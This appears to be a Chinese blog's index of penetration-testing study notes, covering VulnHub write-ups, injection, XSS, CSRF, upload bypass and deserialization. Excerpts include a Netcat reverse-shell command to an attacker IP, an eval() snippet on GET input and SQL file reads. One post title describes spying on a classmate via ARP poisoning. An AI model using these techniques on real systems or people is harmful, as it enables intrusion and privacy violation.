笔记
文章平均质量分 82
个人的学习笔记
cc啊昂昂
阿巴阿巴
展开
-
VulnHub系列之BadStore_123渗透测试
BADSTORE: 1.2.3 早期网商系统漏洞鉴赏(2004)原创 2022-04-25 09:00:00 · 863 阅读 · 0 评论 -
VulnHub系列之ch4inrulz 渗透测试
CH4INRULZ_v1.0.1靶机地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/弗兰克有一个小网站,他是一个聪明的开发人员,具有正常的安全背景,他总是喜欢遵循模式,你的目标是发现任何严重的漏洞并获得对系统的访问权限,然后你需要获得 root 访问权限才能捕获。根标志。这台机器是为 Jordan's Top hacker 2018 CTF 制作的原创 2021-04-26 19:28:55 · 385 阅读 · 0 评论 -
VulnHub系列之Lampiao渗透测试
Lampiao靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/您想继续在自己的实验室中进行黑客攻击吗?试试这个全新的易受攻击的机器!“兰皮奥 1”。原创 2021-04-26 15:53:16 · 408 阅读 · 0 评论 -
VulnHub系列之Jarbas渗透测试
jarbas虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/如果你想继续你的黑客研究,请试试这台机器!Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。目标:获取root shell!原创 2021-04-26 10:29:12 · 1075 阅读 · 0 评论 -
文件上传思路总结
思路总结当遇到js前端脚本限制上传文件类型使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell在前端js判断函数中加上可以上传php文件,或者直接删去这一函数首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell当服务器检测上传文件的MIME类型即媒体类型时当上传PHP文件时,抓包发现Content-Type字段是application/x-php这时只要修改为其他值即可后端原创 2021-03-18 10:56:59 · 741 阅读 · 1 评论 -
CSRF靶场练习
Bodhi - Client-side Vulnerability Playground CSRF篇原创 2021-03-22 14:24:36 · 1830 阅读 · 0 评论 -
Sql基础注入总结
思路总结一般来说首先判断注入点是字符型或者时数值型字符型首先尝试参数带‘ “ ( %等特殊字符,而得到报错信息则很有可能是字符型原创 2021-03-12 16:22:51 · 184 阅读 · 0 评论 -
PHP代码审计总结
AUDIT 启一切的用户输入都是有害的,危险的数据进入了危险的函数便产生了漏洞。从这2句话,不难看出审计的关键在于用户输入和函数因此 大概分出2类审计方法。跟踪用户的输入数据,检查代码运行的逻辑漏洞。检索危险的函数,分析其参数是否被用户输入控制,如果可以,就很有可能有漏洞。网站功能分析注册功能我们要根据需求列出服务器端需要接收的数据,假设有用户名、密码、邮箱、手机号等注销功能根据需要我们要回收令牌资源,保存用户操作以及状态(操作日志、当前用户等级等)。发表评论功能要判断原创 2021-03-29 19:16:52 · 440 阅读 · 0 评论 -
PHP反序列化
序列化以PHP语言为例子,在写程序尤其是写网站的时候,经常会构造类,并且有时候会将实例化的类作为变量进行传输。序列化就是在此为了减少传输内容的大小孕育而生的一种压缩方法。我们知道一个PHP类都含有几个特定的元素: 类属性、类常量、类方法。每一个类至少都含有以上三个元素,而这三个元素也可以组成最基本的类。那么按照特定的格式将这三个元素表达出来就可以将一个完整的类表示出来并传递。序列化就是将一个类压缩成一个字符串的方法<?phpclass TEST{ public $a="public"; pr原创 2021-03-31 19:18:06 · 886 阅读 · 2 评论 -
XSS总结
Xss总结思路总结当服务器未对输入值做任何过滤原样echo当页面保留输入值时当遇到对payload实体转换时当服务器对payload进行尖括号替换时当服务器对payload进行关键字替换时script,on事件过滤src data href 过滤payload必须包含关键词对空格和斜杠替换时当输入字段属性被隐藏时当payload不从浏览器获取时refere 字段--$_SERVER['HTTP_REFERER'];user agent字段--$_SERVER['HTTP_USER_AGENT'];html文原创 2021-03-12 16:26:37 · 235 阅读 · 0 评论 -
命令注入实战靶场分析(未通关靶场2)
通过对2个靶场的实战,总结命令注入的常用思路原创 2021-03-24 20:53:59 · 376 阅读 · 0 评论 -
目录穿越
目录穿越原创 2021-04-08 11:17:57 · 353 阅读 · 0 评论 -
PHP无参函数
eg<?phpif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);} else { show_source(__FILE__);}原创 2021-04-18 15:18:21 · 636 阅读 · 0 评论 -
利用Mysql导入恢复读取本地任意文件
前最近刷到一个题目,挺有意思的,以前没有见过,记录一下题目直接弱密码杀进后台,这个题目有很多文件上传点,但都使用了白名单,截断文件名也失败了.最后发现一个页面提供了恢复备份数据表的功能.这里就想到能不能去做一个读取本地flag文件然后写入到数据表中,再下载新的数据表这样就可以看到flag文件了.去搜了一下,想要读取本地文件有3种方法.insert into user('flag_value') values (load_file('/1.txt')) load data infile '原创 2021-04-11 12:45:31 · 131 阅读 · 0 评论 -
Session 会话劫持和cookie窃取
会话劫持会话劫持(Session hijacking),这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户思路攻击者不获取用户的cookie和session,而是想办法让用户在不知情的情况自己去踩坑。比如CSRF跨站脚本让已经被服务器验证通过的用户来帮攻击者完成危险操作。1.攻击者构造特殊的界面,请求修改密码。//evil.html<原创 2021-04-08 17:45:35 · 904 阅读 · 0 评论 -
NC获取系统权限
Netcat利用nc工具可以使命令注入攻击变得更加六匹命令注入思路总结反向 reverse shell反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式,又叫被动连接nc实现shell反弹step1-攻击机开始监听本地端口 nc -lvp 4444step2-目标机向攻击机的端口提供shell,实现权限转移nc 192.168.43.175 4444 -e /bin/bash step3-当在攻击端看到收到连接后就说明已经得到了目标机器的部分shell了原创 2021-04-02 11:35:51 · 670 阅读 · 0 评论 -
AWD平台搭建与使用入门
简单介绍平台搭建因为平台已经做的比较集成化,所以安装还是很简单的。首先需要下载赛题项目git clone https://github.com/zhl2008/awd-platform#这一条命令可以将文件下载到当前工作目录,文件名为awd-platform因为项目地址是在github上面,所以对某些国内用户可能会有一些网络问题,这里博主搬运了一下,上传到csdn上面了。(点击前往)然后需要下载dockersudo apt install docker.io这里如果没有更换ap原创 2021-03-16 16:20:19 · 9877 阅读 · 11 评论 -
Ubuntu20LTS 服务搭建与安全加固
Ubuntu常用服务DNS,DHCP,APACHE,FTP,MYSQL的详细搭建和安全加固原创 2021-02-18 23:03:11 · 2374 阅读 · 0 评论 -
WindowsServer2008的服务搭建与安全加固
WInServer2008的IIS,DNS,DHCP,FTP常用服务的详细搭建过程和安全加固原创 2021-02-17 20:23:54 · 769 阅读 · 2 评论 -
偷偷远程窥视同班女孩的qq图片(arp中毒+dns劫持)
注:以下行为皆是在自己的机器上实现的,请勿攻击未授权的目标,这侵犯了人们的隐私权前言:首先来介绍一下我们要用到的工具Ettercap从英文翻译而来-Ettercap是在LAN人在这方面的中间人攻击自由和开放源码网络安全工具。它可用于计算机网络协议分析和安全审核。它可以在各种类Unix操作系统(包括Linux,Mac OS X,BSD和Solaris)以及Microsoft Windows上运行。它能够拦截网段上的流量,捕获密码并针对多种常见协议进行主动窃听。Driftnet监视网络流量,抓取网络原创 2020-10-14 20:55:22 · 890 阅读 · 1 评论 -
python3scapy库函数使用,发送数据包
scapy函数交互式网络分组处理模块。可以用于构造或者解码大量的数据包协议,发送,捕获数据包并匹配请求和回复。导入scapy库from scapy.all import *构造数据包简单构造直接构造默认数据包 >>> a=IP() #不带参数表示构造默认的IP数据包 >>> a.show() #查看数据包a的相关信息 ###[ IP ]### version = 4 ihl = None tos = 0x0原创 2020-09-27 14:16:08 · 2959 阅读 · 0 评论 -
python实现word转anki制卡格式
目录阿超级长的吐槽前言目标简述第一歩:将段落格式转换为英文和汉字分开并且以tab制表符分开第二步:使用有道翻译url带入短语参数获取例句信息第三步:导入anki超级长的吐槽前言最近需要背一下短语,没有在各大背单词app上面找到我需要背的词书.没办法了,去网上找到了某垃圾教育网站的word,…,这个格式,简直惨不忍睹,???那个憨憨做的文档??分栏不会吗居然手打空格来分栏,我佛了np,来感受一下好吧,我承认光是把格式改成一条词汇一行我就花了半个小时…目标简述首先需要将上一张图片的格式转换为英文和原创 2020-08-21 11:25:20 · 2619 阅读 · 0 评论 -
PHP连接SQL服务器,实现对记录的查看,编辑,删除功能
60行代码实相网页对数据库记录的操作原创 2020-06-20 16:05:46 · 338 阅读 · 0 评论 -
利用python实现文件搜索功能
利用python,纯有效代码13行实现简单文件搜索功能原创 2020-06-20 14:58:34 · 2717 阅读 · 0 评论 -
PHP会话维持是如何实现的(session,cookie)
会话维持原创 2020-06-18 15:38:04 · 348 阅读 · 0 评论 -
kali子系统渗透工具被查杀??(不用关闭实时防护)
前言:最近对这些花里胡哨的东西很感兴趣啊。这次是因为在尝试远程ipad控制电脑时,成功后ssh使用kali的时候出错了。然后对着windows安全中心看了好久,虽然知道只要关了实时防护之后就可以了,但是,,,关了不爽啊!!然后就发现了还有排除项这一个东西,再结合了一下报错信息,那么问题就轻松解决了打开windows安全中心----病毒和威胁防护打开病毒和威胁防护设置-----管理设置...原创 2020-04-08 20:51:27 · 482 阅读 · 0 评论 -
手机安装kali以及后续配置
前言:突然想在手机上安装一个kali,就去坐了,发现如果只是简单的安装系统的话,其实很简单。不过在后期下载的时候出现各种问题,大概重新装了三次左右的样子吧一.使用工具介绍termux:首先在手机上下载这个软件,官网(https://termux.com/)在官网也不能直接下载termux,说的是不安全,就可以先下载这个F-droid,类似于一个软件商店,第一次使用会要求更新软件包信息(软件...原创 2020-03-27 16:29:41 · 10273 阅读 · 11 评论 -
到底什么是WAF??
前言:本文将简单的介绍什么是WAF,如何判断WAF,如何简单的绕过WAF1.什么是WAFWeb Application Firewall(web应用防火墙),一种公认的说法是“web应用防火墙通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。基本可以分为以下4种软件型WAF以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务...原创 2020-03-19 15:26:32 · 8134 阅读 · 0 评论 -
python实现自动每日数据填报和结果短信通知
实在是不想每天都去填报数据,,经常搞完,还要算考勤,,,,文章目录思路第一步:将url和payload确认下来第二步:进行登陆操作第三步:发送填报数据第四步:检测是否已经填写数据第五步:twilio短信通知组合服务器自动执行尾巴思路其实还是比较简单的,主要先利用requests模块进行登陆,然后post数据填报,在读取历史数据有没有今天的记录实现一个校验,最后再利用twilio模块将填报的结果短信发送到我自己的手机上。脚本完成后放到服务器上面设置定时每天执行就好了。第一步:将url和payload确原创 2020-06-12 23:49:54 · 1914 阅读 · 0 评论 -
使用PHP创建一个在线文件库(3)文件上传
项目目标实现具有上传,查看,删除。下载功能的在线文件库。文章目录项目目标1.文件上传设置2.编写文件上传表单客户端3.编写PHP上传处理脚本1.文件上传设置要保证上传成功,首先要进行正确的设置,包括设置表单字符编码方式,客户端文件大小,php.ini中的有关文件上传设置。1.设置表单字符编码方式在文件上传客户端表单后,应将表单编程方式设置为multipart/form-data<form enctype="multipart/form-data" ...>2.设置客户端文件大小原创 2020-05-26 12:46:52 · 241 阅读 · 0 评论 -
使用PHP创建一个在线文件库(2)目录操作
惊到我了项目目标实现具有上传,查看,删除。下载功能的在线文件库。第二阶段目录操作:主要包括创建,删除目录,解析目录,遍历目录1.删除和创建目录1.mkdir函数:创建指定目录,返回bool2.rmdir函数:删除指定目录,返回bool,需要注意的一点是若目录不为空或者没有操作权限,那么将不能完成操作。2.目录删除与创建的练习<?php echo "创建和删除目录"; $dirname="testdir"; if(mkdir($dirname)){原创 2020-05-22 23:18:36 · 386 阅读 · 0 评论 -
使用PHP创建一个在线文件库(1)相关知识了解
了解文件操作,删除,打开,关闭,指针操作,写入,读取,获取属性原创 2020-05-21 17:19:19 · 273 阅读 · 1 评论